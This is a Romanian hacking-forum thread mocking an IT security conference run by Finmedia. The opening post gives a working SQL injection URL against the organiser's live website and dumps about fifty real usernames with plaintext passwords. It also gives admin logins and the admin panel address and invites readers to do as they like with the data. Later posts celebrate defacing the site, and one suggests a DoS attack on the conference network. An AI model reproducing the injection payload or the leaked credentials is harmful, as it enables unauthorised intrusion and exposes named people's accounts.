Nytro Posted October 5, 2011 Report Share Posted October 5, 2011 (edited) Forumul securitatii IT, pe 11 octombriede Laurentiu Popa | 4 octombrie 2011Finmedia, in parteneriat cu KPMG Romania, organizeaza a patra editie a Romanian IT&C Security Forum, eveniment important pentru piata produselor si serviciilor de securitate IT.In contextul noilor forme de hacking, cand sunt dezvoltate forme avansate de atacuri, care sa reziste mai bine in timp si de pe urma carora se urmareste sa se obtina controlul infrastructurilor IT, cand dispozitivele mobile castiga teren vazand cu ochii, cand securitatea este si mai amenintata de comportamentul angajatilor ce poate duce la erori umane, ce faciliteaz? pierderea de date si vulnerabilizeaza infrastructura, riscurile de compromitere a afacerii cresc exponential.Pe o piata de produse si servicii de securitate IT care ruleaza oficial sub 15 milioane de euro pe an, exista nevoia de a se face evaluari periodice, a se gasi un prilej de a privi atent la noutati, strategii si abordari, a desprinde perspective si initiative in acest domeniu de nisa.Evenimentul se va tine pe 11 octombrie 2011, incepand cu ora 9, la Hotel Crowne Plaza din Bucuresti, sala Magnolia.Cine participa:- reprezentanti ai organismelor oficiale si ai asociatiilor profesionale- middle managementul din companii mijlocii si mari care au responsabilita?i directe in business- IT manageri, ingineri de sistem- consultanti independenti de specialitate- auditori si persoane certificate- furnizori de sisteme si solutii de securitate IT- CIO si CISO din banci comercialeVa sfatuim sa participati, pentru a va informa in legatura cu dinamica pietei globale de securitate la nivel european, prin comparatii cu evolutiile din Romania, norme, reglementari si noutati pe linie institutionala. De asemenea, vor fi prezentate noile tendinte, abordari si mijloace de protectie a companiei contra cybercrimei. Per total, se prezinta o imagine de ansamblu asupra ofertei de moment de pe piata de produse si servicii specializate pe securitate IT.Sursa: Forumul securitatii IT, pe 11 octombrie | Hit.roSe vede din programul lor ce rahat o sa fie, industrializarea hacking-ului...De cand "restrictionarea accesului angajatilor la Internet" e o problema de securitate?TAXA DE PARTICIPARE: 496 lei /pers, TVA inclus.Sa-i fut in gura, muritori de foame, de-ar avea parte de ei in mormant. Program (cu SQL Injection)http://www.finmedia.ro/conferences/conferinta.php?cod=rom_itc_sec_for&editie=4&comanda=programDe XSS in cautare nici nu se pune problema. Cand am timp ma uit in detaliu.Si tot nu inteleg, de ce "Forumul securitatii IT"?In fine, am ceva idei Edit:Tabele:conferinte contacte log speakeri speakeri_conf sponsori sponsori_conf utilizatori utilizatori_conf articole cuprins_reviste descriere_sectiuni newsletter Utilizatori si parole (tabelul "utilizatori"):galatop100:galatop100 ,alina_berlea:gianny ,Catalin Spataru:sdc66sdc66 ,georgs:elenageorge ,eiovu:silverbird357 ,vizitator: ,danielnvasile:tumpilica ,roxanatoader:19962407 ,Daniel:daniel ,sache:sachita ,paltineanu:secret ,valentinbogdan:supersucces ,macovei:fin.media2004 ,lupiduph:piroman ,bolteanu:123456 ,ddbroa:123456 ,sviorel:vserbu ,sbejan:garidas ,diana:itdromania ,sorinaun:heralzii ,Alex:h2oh2o ,Alecks:h2oh2o ,ramona:roxana ,Flory:mazepa ,: ,Ecaterina:caterinar ,gabiarsene:razvan ,iona:guguloi ,madalina:madalina ,gerald.dinca:star86 ,FLORENTINS:CCPCFRDC ,cgalea:crimong ,PopM:autovit ,da-tech:datechinfo ,georgiana:15201929 ,MARCEL:MARCEL ,Burky:MpRomania ,dorian:doru ,accalugaru:corina ,VILIE:eili ,catalina:piticque ,iulianbudusan:1t5m9r4h ,dinescu:sandi ,simonada:margareta ,caliman:emil ,erykal:pasttense ,munteanu:munteanu ,mdanilov:pezevenghi ,PRIMARIE:DTS ,Adrian:adrian ,PetronelaD:alfach ,vicbogdan2004:david18 ,doina:draganescu ,LAURENTIU:l Sintaxa:www.finmedia.ro/conferences/conferinta.php?comanda=program&editie=4&cod=null' union select 1,2,3,4,5,6,7,group_concat(username, 0x3a, password, 0xD, 0xA),9,10,11,12,13,14,15,16 from utilizatori-- --+--Thanks tdxev.Conturi de admin:Username: eiovuPassword: silverbird357Username: conferintePassword: 1master2Administrare: http://www.finmedia.ro/conferences/admin.phpFaceti ce doriti cu datele. PS: Problema rezolvata:http://www.finmedia.ro/conferences/ Edited October 5, 2011 by Nytro Quote Link to comment Share on other sites More sharing options...
Zatarra Posted October 5, 2011 Report Share Posted October 5, 2011 Poate sunt incluse niste dame de compamuie sa fii in forma .Eu zic sa ii ardeti. Quote Link to comment Share on other sites More sharing options...
DuTy^ Posted October 5, 2011 Report Share Posted October 5, 2011 TAXA DE PARTICIPARE:496 lei /pers, TVA inclus.Chiar ca muritori de foame! Probabil vrea sa tina "pleava" afara, ca asa vine doar elita=))))Ce jegosi! daca era 100 lei MAXIM mergeam, dar asa prefer sa ma imi iau jucarii... Quote Link to comment Share on other sites More sharing options...
Nytro Posted October 5, 2011 Author Report Share Posted October 5, 2011 Arsi: Conferintele FinMedia, Evenimentele FinMedia, Publicatiile FinMedia Quote Link to comment Share on other sites More sharing options...
qbert Posted October 5, 2011 Report Share Posted October 5, 2011 (edited) Pagina in curs de actualizare. edit: & 2 mins later fixed Edited October 5, 2011 by qbert Quote Link to comment Share on other sites More sharing options...
Nytro Posted October 5, 2011 Author Report Share Posted October 5, 2011 Mie tot imi merge redirectul, apare si mesajul... Quote Link to comment Share on other sites More sharing options...
wildchild Posted October 5, 2011 Report Share Posted October 5, 2011 Si mie.Eventual o sa sterg cookieurile sa vad daca nu se incarca din cache cumva.O sa editez imediat.Edit:shit still works. Quote Link to comment Share on other sites More sharing options...
cifratorul Posted October 5, 2011 Report Share Posted October 5, 2011 ce kkt e asta? parca si vad niste burtosi daia corporatisti care au pe langa ei vreo 2 ochelaristi ("expertii tehnici") se duc acolo poate sa bage pe gat la cine pune botu vreo solutie de securitate de-a vreunui consultant/furnizor "autorizat". Ar trebui sa luati toate pozele alea de chipuri de corporatisti sa le puneti chenar negru de doliu. toti comunistii sa dispara!! Quote Link to comment Share on other sites More sharing options...
Jimmy Posted October 5, 2011 Report Share Posted October 5, 2011 Inca merge redirectul Quote Link to comment Share on other sites More sharing options...
DuTy^ Posted October 5, 2011 Report Share Posted October 5, 2011 Good job! Ma intreb ce vor zice, clientilor despre "hacuirea" sait-ului:)) Quote Link to comment Share on other sites More sharing options...
Moderators Dragos Posted October 5, 2011 Moderators Report Share Posted October 5, 2011 This made my day Quote Link to comment Share on other sites More sharing options...
Nytro Posted October 5, 2011 Author Report Share Posted October 5, 2011 (edited) Au "reparat", dar parolele sunt aceleasi, probabil si SQLI-ul mai este. Am pus doar text.PS: Ia vedeti acum Conferintele FinMedia, Evenimentele FinMedia, Publicatiile FinMediaEdit: Cred ca au oprit serverul Edited October 5, 2011 by Nytro Quote Link to comment Share on other sites More sharing options...
Cheater Posted October 5, 2011 Report Share Posted October 5, 2011 Acum nu mai raspunde serverul Si-or fi dat seama ca gresesc si s-au gandit sa scoata... Quote Link to comment Share on other sites More sharing options...
Nytro Posted October 5, 2011 Author Report Share Posted October 5, 2011 (edited) Da, nu stiu ce fac ei acolo, dar mie mi se pare ca nu fac nimic.Nu am ce face. Vrea cineva sa participe? Sa isi faca cont si sa imi spuna datele sa il confirm. Edited October 5, 2011 by Nytro Quote Link to comment Share on other sites More sharing options...
Andrei Posted October 5, 2011 Report Share Posted October 5, 2011 Da, nu stiu ce fac ei acolo, dar mie mi se pare ca nu fac nimic.Nu am ce face. Vrea cineva sa participe? Sa isi faca cont si sa imi spuna datele sa il confirm. Ahahaha. ) Quote Link to comment Share on other sites More sharing options...
co4ie Posted October 5, 2011 Report Share Posted October 5, 2011 pai hai sa ne adunam cei din bucuresti , mergem imbracati cu tricourile de la defcamp , si in timpul "conferintei" incercam sa vedem ce se poate face in retea... daca nu DoS masiv pe ei si gata... Quote Link to comment Share on other sites More sharing options...
turnback Posted October 5, 2011 Report Share Posted October 5, 2011 Lol. Atatia bani pentru ce? Retards.Anyway, nu-i cunosc, da' cu parere de rau va spun ca acolo s-ar putea lasa cu incheieri de contracte de mii (zeci?) de euro. Ei fac bani noi le spargem capul. Who wins? Quote Link to comment Share on other sites More sharing options...
Andrei Posted October 5, 2011 Report Share Posted October 5, 2011 @turnback Defapt aia sunt oamenii care pot incheia contracte, acolo doar se lauda. ) Quote Link to comment Share on other sites More sharing options...
Zatarra Posted October 5, 2011 Report Share Posted October 5, 2011 @turnback Defapt aia sunt oamenii care pot incheia contracte, acolo doar se lauda. )Aici ai dreptate.. Quote Link to comment Share on other sites More sharing options...
Nytro Posted October 6, 2011 Author Report Share Posted October 6, 2011 Se pare ca au reparat. Eh, asta e, ce-a fost a fost. Quote Link to comment Share on other sites More sharing options...
kasmir Posted October 6, 2011 Report Share Posted October 6, 2011 Pana la urma se pare ca i-ati ajutat, cel mai frumos ar fi fost sa va strangeti ''cativa'' si sa mergeti acolo unde se tine ''conferinra'' oricum ar trebui sa va multumeasca poate prindeti o colaborare cu ei ca oamenii vad ca ''dau bine'' pe marketing Ps: GJ nytro Quote Link to comment Share on other sites More sharing options...
xhigh Posted October 7, 2011 Report Share Posted October 7, 2011 Deci ahahahaha MOR DE RAS -->Kit prim ajutor : downloaduri din Kit prim ajutorLa rahatii astia programe ca Winamp-ul sau Recuva sunt -> citez:Winamp Full 5.572 (Kit de prim ajutor)Recuva 1.36.479 (Kit prim ajutor)Deci :Ti s-a virusat calculatorul?Ai pierdut informatii de pe el?Click aici pentru KITUL de prim ajutorSi acolo gasesti un winamp, niste drivere .. chestii dastea .Ce treaba au astea cu virusii si cu pc-ul virusat?De unde pana unde winamp-ul este considerat un "kit de prim ajutor in caz ca ai pc-ul virusat?"Fratilor astia ori sunt beti , pastilati ori au o problema des intalnita : dezvoltarea prostiei . Quote Link to comment Share on other sites More sharing options...
adoamneia Posted October 7, 2011 Report Share Posted October 7, 2011 Merge careva? Quote Link to comment Share on other sites More sharing options...
DuTy^ Posted October 7, 2011 Report Share Posted October 7, 2011 Daca faci cinste, da! Quote Link to comment Share on other sites More sharing options...
adoamneia Posted October 7, 2011 Report Share Posted October 7, 2011 Ma gandeam la faza ca o sa ne povesteasca si noua cum a fost Quote Link to comment Share on other sites More sharing options...